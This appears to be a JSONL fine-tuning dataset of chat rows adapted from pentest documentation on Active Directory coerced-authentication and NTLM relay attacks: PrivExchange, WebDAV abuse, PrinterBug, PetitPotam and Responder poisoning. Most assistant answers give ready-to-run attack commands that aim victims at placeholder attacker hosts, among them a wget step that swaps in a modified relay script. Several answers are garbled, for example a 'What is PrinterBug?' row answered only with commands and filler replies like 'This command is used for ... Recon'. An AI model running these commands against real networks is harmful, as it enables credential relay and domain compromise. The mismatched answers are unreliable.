doesn't have any credentials, it is still possible to relay an authentication to make the API call.\n> \n> The modified httpattack.py can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.\n> \n> `bash\n> cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py\n> mv httpattack.py httpattack.py.old\n> wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py\n> sed -i 's/attacker_url = .*$/attacker_url = \"$ATTACKER_URL\"/' httpattack.py\n> cd /PATH/TO/impacket\n> pip3 install .\n> ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx\n> ``\n\n> [!NOTE]\n> On February 12th 2019, Microsoft released updates for Exchange which resolved\n> \n> * the coerced authentication issue\n> * the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.", "metadata": {"corpus_index": 888, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the privexchange.py syntax for pushsubscription abuse - practice?"}, {"role": "assistant", "content": "privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the privexchange.py syntax for pushsubscription abuse - practice?", "response": "privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET", "metadata": {"corpus_index": 889, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "privexchange.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for PushSubscription abuse - Practice?"}, {"role": "assistant", "content": "privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for PushSubscription abuse - Practice?", "response": "privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET", "metadata": {"corpus_index": 889, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET`?"}, {"role": "assistant", "content": "This command is used for pushsubscription abuse - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET`?", "response": "This command is used for pushsubscription abuse - practice. Practice", "metadata": {"corpus_index": 889, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is WebClient abuse (WebDAV) - Theory?"}, {"role": "assistant", "content": "> Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)\n\nThe WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is WebClient abuse (WebDAV) - Theory?", "response": "> Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)\n\nThe WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.", "metadata": {"corpus_index": 890, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WebClient abuse (WebDAV) - Theory"}, {"role": "assistant", "content": "> Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)\n\nThe WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WebClient abuse (WebDAV) - Theory", "response": "> Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)\n\nThe WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug), or multicast poisoning, to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.", "metadata": {"corpus_index": 890, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about WebClient abuse (WebDAV) - Recon?"}, {"role": "assistant", "content": "Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using NetExec (Python).\n\n``bash\nwebclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav\n`\n\n=== Windows\n\nFrom Windows systems, this can be achived with GetWebDAVStatus (C, C#)\n\n`bash\nGetWebDAVStatus.exe 'machine'\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about WebClient abuse (WebDAV) - Recon?", "response": "Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using NetExec (Python).\n\n``bash\nwebclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav\n`\n\n=== Windows\n\nFrom Windows systems, this can be achived with GetWebDAVStatus (C, C#)\n\n`bash\nGetWebDAVStatus.exe 'machine'\n``\n\n:::", "metadata": {"corpus_index": 891, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WebClient abuse (WebDAV) - Recon"}, {"role": "assistant", "content": "Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using NetExec (Python).\n\n``bash\nwebclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav\n`\n\n=== Windows\n\nFrom Windows systems, this can be achived with GetWebDAVStatus (C, C#)\n\n`bash\nGetWebDAVStatus.exe 'machine'\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WebClient abuse (WebDAV) - Recon", "response": "Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using NetExec (Python).\n\n``bash\nwebclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav\n`\n\n=== Windows\n\nFrom Windows systems, this can be achived with GetWebDAVStatus (C, C#)\n\n`bash\nGetWebDAVStatus.exe 'machine'\n``\n\n:::", "metadata": {"corpus_index": 891, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the webclientservicescanner command for webclient abuse (webdav) - recon"}, {"role": "assistant", "content": "webclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the webclientservicescanner command for webclient abuse (webdav) - recon", "response": "webclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav", "metadata": {"corpus_index": 892, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "webclientservicescanner"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out WebClient abuse (WebDAV) - Recon during a pentest?"}, {"role": "assistant", "content": "webclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out WebClient abuse (WebDAV) - Recon during a pentest?", "response": "webclientservicescanner 'domain.local'/'user':'password'@'machine'\nnetexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav", "metadata": {"corpus_index": 892, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `webclientservicescanner 'domain.local'/'user':'password'@'machine'`?"}, {"role": "assistant", "content": "This command is used for webclient abuse (webdav) - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `webclientservicescanner 'domain.local'/'user':'password'@'machine'`?", "response": "This command is used for webclient abuse (webdav) - recon. Recon", "metadata": {"corpus_index": 892, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the GetWebDAVStatus.exe command to webclient abuse (webdav) - recon"}, {"role": "assistant", "content": "GetWebDAVStatus.exe 'machine'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the GetWebDAVStatus.exe command to webclient abuse (webdav) - recon", "response": "GetWebDAVStatus.exe 'machine'", "metadata": {"corpus_index": 893, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GetWebDAVStatus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WebClient abuse (WebDAV) - Recon?"}, {"role": "assistant", "content": "GetWebDAVStatus.exe 'machine'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WebClient abuse (WebDAV) - Recon?", "response": "GetWebDAVStatus.exe 'machine'", "metadata": {"corpus_index": 893, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GetWebDAVStatus.exe 'machine'`?"}, {"role": "assistant", "content": "This command is used for webclient abuse (webdav) - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GetWebDAVStatus.exe 'machine'`?", "response": "This command is used for webclient abuse (webdav) - recon. Recon", "metadata": {"corpus_index": 893, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WebClient abuse (WebDAV) - Abuse from authentication coercion"}, {"role": "assistant", "content": "Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The \"other\" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.\n\nThe WebDAV Connection String format is: \\\\SERVER@PORT\\PATH\\TO\\DIR.\n\n> [!TIP]\n> To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.\n> \n> In order to have a valid NetBIOS name, Responder can be used.\n> \n> A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.\n\nBelow are a few examples of WebClient abuse with PrinterBug and PetitPotam.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WebClient abuse (WebDAV) - Abuse from authentication coercion", "response": "Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The \"other\" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.\n\nThe WebDAV Connection String format is: \\\\SERVER@PORT\\PATH\\TO\\DIR.\n\n> [!TIP]\n> To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.\n> \n> In order to have a valid NetBIOS name, Responder can be used.\n> \n> A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.\n\nBelow are a few examples of WebClient abuse with PrinterBug and PetitPotam.\n\n```bash", "metadata": {"corpus_index": 894, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WebClient abuse (WebDAV) - Abuse from authentication coercion?"}, {"role": "assistant", "content": "Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The \"other\" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.\n\nThe WebDAV Connection String format is: \\\\SERVER@PORT\\PATH\\TO\\DIR.\n\n> [!TIP]\n> To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.\n> \n> In order to have a valid NetBIOS name, Responder can be used.\n> \n> A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.\n\nBelow are a few examples of WebClient abuse with PrinterBug and PetitPotam.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WebClient abuse (WebDAV) - Abuse from authentication coercion?", "response": "Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The \"other\" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.\n\nThe WebDAV Connection String format is: \\\\SERVER@PORT\\PATH\\TO\\DIR.\n\n> [!TIP]\n> To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.\n> \n> In order to have a valid NetBIOS name, Responder can be used.\n> \n> A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.\n\nBelow are a few examples of WebClient abuse with PrinterBug and PetitPotam.\n\n```bash", "metadata": {"corpus_index": 894, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is PrinterBug?"}, {"role": "assistant", "content": "dementor.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nSpoolSample.exe \"VICTIM_IP\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is PrinterBug?", "response": "dementor.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nSpoolSample.exe \"VICTIM_IP\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\"", "metadata": {"corpus_index": 895, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out PrinterBug during a pentest?"}, {"role": "assistant", "content": "dementor.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nSpoolSample.exe \"VICTIM_IP\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out PrinterBug during a pentest?", "response": "dementor.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nSpoolSample.exe \"VICTIM_IP\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\"", "metadata": {"corpus_index": 895, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is PetitPotam?"}, {"role": "assistant", "content": "Petitpotam.py \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitpotam.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitPotam.exe \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is PetitPotam?", "response": "Petitpotam.py \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitpotam.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitPotam.exe \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\n```", "metadata": {"corpus_index": 896, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do PetitPotam"}, {"role": "assistant", "content": "Petitpotam.py \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitpotam.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitPotam.exe \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do PetitPotam", "response": "Petitpotam.py \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitpotam.py -d \"DOMAIN\" -u \"USER\" -p \"PASSWORD\" \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\nPetitPotam.exe \"ATTACKER_NETBIOS_NAME@PORT/randomfile.txt\" \"VICTIM_IP\"\n```", "metadata": {"corpus_index": 896, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain WebClient abuse (WebDAV) - Abuse from multicast poisoning"}, {"role": "assistant", "content": "In a different way, under certain conditions it is possible to force a WebDAV authentication from a multicast poisoning. Indeed, according to this article from Synacktiv, if the WebClient service is running on a machine, it is possible to obtain a WebDAV authentication from a multicast poisoning, instead of an SMB one, by changing the error code returned.\n\nIn fact, as explained in the article, Responder normally ends the authentication exchange with a STATUS_ACCESS_DENIED status code in the context of the SMB exchange, closing the connection immediatly. However, by changing the code to STATUS_LOGON_FAILURE (0xc000006d) or STATUS_BAD_NETWORK_NAME (0xc00000cc), the SMB client will not immediatly close the connection and will attempt to fallback to the WebDAV client (if the WebClient service is running).\n\nBelow, an example to perform the attack with Responder (Python). At the time of writing, this pull request must be used.\n\n``bash\nresponder --interface \"eth0\" -E\n`\n\nAlternatively, by default, smbserver.py (Python) from Impacket ends the communications with STATUS_LOGON_FAILURE.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain WebClient abuse (WebDAV) - Abuse from multicast poisoning", "response": "In a different way, under certain conditions it is possible to force a WebDAV authentication from a multicast poisoning. Indeed, according to this article from Synacktiv, if the WebClient service is running on a machine, it is possible to obtain a WebDAV authentication from a multicast poisoning, instead of an SMB one, by changing the error code returned.\n\nIn fact, as explained in the article, Responder normally ends the authentication exchange with a STATUS_ACCESS_DENIED status code in the context of the SMB exchange, closing the connection immediatly. However, by changing the code to STATUS_LOGON_FAILURE (0xc000006d) or STATUS_BAD_NETWORK_NAME (0xc00000cc), the SMB client will not immediatly close the connection and will attempt to fallback to the WebDAV client (if the WebClient service is running).\n\nBelow, an example to perform the attack with Responder (Python). At the time of writing, this pull request must be used.\n\n``bash\nresponder --interface \"eth0\" -E\n`\n\nAlternatively, by default, smbserver.py (Python) from Impacket ends the communications with STATUS_LOGON_FAILURE.\n\n``bash", "metadata": {"corpus_index": 897, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/webclient.md", "page_title": "WebClient abuse (WebDAV)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WebClient abuse (WebDAV) - Abuse from multicast poisoning?"}, {"role": "assistant", "content": "In a different way, under certain conditions it is possible to force a WebDAV authentication from a multicast poisoning. Indeed, according to this article from Synacktiv, if the WebClient service is running on a machine, it is possible to obtain a WebDAV authentication from a multicast poisoning, instead of an SMB one, by changing the error code returned.\n\nIn fact, as explained in the article, Responder normally ends the authentication exchange with a STATUS_ACCESS_DENIED status code in the context of the SMB exchange, closing the connection immediatly. However, by changing the code to STATUS_LOGON_FAILURE (0xc000006d) or STATUS_BAD_NETWORK_NAME (0xc00000cc), the SMB client will not immediatly close the connection and will attempt to fallback to the WebDAV client (if the WebClient service is running).\n\nBelow, an example to perform the attack with Responder (Python). At the time of writing, this pull request must be used.\n\n``bash\nresponder --interface \"eth0\" -E\n`\n\nAlternatively, by default, smbserver.py (Python) from Impacket ends the communications with STATUS_LOGON_FAILURE.\n\n``bash"}], "system": "You are a penetration 